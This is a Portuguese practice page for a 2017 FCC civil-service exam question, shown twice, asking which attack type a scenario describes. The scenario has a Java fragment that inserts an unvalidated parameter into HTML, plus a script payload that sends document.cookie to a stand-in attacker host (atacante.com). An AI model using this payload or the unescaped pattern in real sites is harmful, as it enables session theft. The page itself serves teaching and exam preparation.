Considere um cenário em que uma aplicação utiliza dados não confiáv...

Q: Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro: (String) page += "<input name='num_cartao_credito' type='TEXT'

A) Advanced Persistent Threat. | B) Buffer Overflow. | C) Session Persistent Hijacking. | D) Script-Fake Injection. | E) Cross-Site Scripting.

Question 1

Considere um cenário em que uma aplicação utiliza dados não confiáv...

📅 2017🏢 FCC🎯 TRT - 24ª REGIÃO (MS)📚 Segurança da Informação e Criptografia

#Cibersegurança

Esta questão foi aplicada no ano de 2017 pela banca FCC no concurso para TRT - 24ª REGIÃO (MS). A questão aborda conhecimentos da disciplina de Segurança da Informação e Criptografia, especificamente sobre Cibersegurança.

Esta é uma questão de múltipla escolha com 5 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941201870573

Ano: 2017Banca: FCCOrganização: TRT - 24ª REGIÃO (MS)Disciplina: Segurança da Informação e CriptografiaTemas: Cibersegurança

Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:

(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +

request.getParameter("credit_card") + " '>";

Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:

'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>'

Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.

Este é um cenário de ataque do tipo

A

B

C

D

E

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200065733Segurança da Informação e Criptografia

O sistema criptográfico de chave pública RSA permite que o recebedor da mensagem, Roberto, crie suas chaves públicas e privadas. Para usar o RSA, Robe...

#Criptografia

Questão 457941200412070Segurança da Informação e Criptografia

Segundo a norma ISO 27001, para se estabelecer o Sistema de Gestão de Segurança da Informação (SGSI), considere: I. A organização deve definir uma pol...

#ISO/IEC 27001

Questão 457941200626827Segurança da Informação e Criptografia

No que diz respeito a GPO (Group Policy Object) deve-se ter em mente a diretiva de grupo. Diretiva de grupo é um conjunto de regras que se pode utiliz...

#Medidas de Segurança

Questão 457941200755742Segurança da Informação e Criptografia

Um Tribunal Regional do Trabalho está implementando uma API RESTful para permitir que advogados acessem informações de processos judiciais de maneira ...

#Autenticação de Usuário

Questão 457941201223109Segurança da Informação e Criptografia

Uma Política de Tratamento de Incidentes de Segurança da Informação deve conter um procedimento padronizado para o tratamento de incidentes que compre...

#Gestão de Segurança da Informação

Questão 457941202057494Segurança da Informação e Criptografia

Um plano de tratamento de riscos que identifique a ação de gestão apropriada, recursos, responsabilidades e prioridades para a gestão dos riscos de se...

#ISO/IEC 27001

Question 2

Considere um cenário em que uma aplicação utiliza dados não confiáv...

📅 2017🏢 FCC🎯 TRT - 24ª REGIÃO (MS)📚 Segurança da Informação e Criptografia

#Cibersegurança

Esta questão foi aplicada no ano de 2017 pela banca FCC no concurso para TRT - 24ª REGIÃO (MS). A questão aborda conhecimentos da disciplina de Segurança da Informação e Criptografia, especificamente sobre Cibersegurança.

Esta é uma questão de múltipla escolha com 5 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941201870573

Ano: 2017Banca: FCCOrganização: TRT - 24ª REGIÃO (MS)Disciplina: Segurança da Informação e CriptografiaTemas: Cibersegurança

Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:

(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +

request.getParameter("credit_card") + " '>";

Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:

'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>'

Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.

Este é um cenário de ataque do tipo

A

B

C

D

E

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200065733Segurança da Informação e Criptografia

O sistema criptográfico de chave pública RSA permite que o recebedor da mensagem, Roberto, crie suas chaves públicas e privadas. Para usar o RSA, Robe...

#Criptografia

Questão 457941200412070Segurança da Informação e Criptografia

Segundo a norma ISO 27001, para se estabelecer o Sistema de Gestão de Segurança da Informação (SGSI), considere: I. A organização deve definir uma pol...

#ISO/IEC 27001

Questão 457941200626827Segurança da Informação e Criptografia

No que diz respeito a GPO (Group Policy Object) deve-se ter em mente a diretiva de grupo. Diretiva de grupo é um conjunto de regras que se pode utiliz...

#Medidas de Segurança

Questão 457941200755742Segurança da Informação e Criptografia

Um Tribunal Regional do Trabalho está implementando uma API RESTful para permitir que advogados acessem informações de processos judiciais de maneira ...

#Autenticação de Usuário

Questão 457941201223109Segurança da Informação e Criptografia

Uma Política de Tratamento de Incidentes de Segurança da Informação deve conter um procedimento padronizado para o tratamento de incidentes que compre...

#Gestão de Segurança da Informação

Questão 457941202057494Segurança da Informação e Criptografia

Um plano de tratamento de riscos que identifique a ação de gestão apropriada, recursos, responsabilidades e prioridades para a gestão dos riscos de se...

#ISO/IEC 27001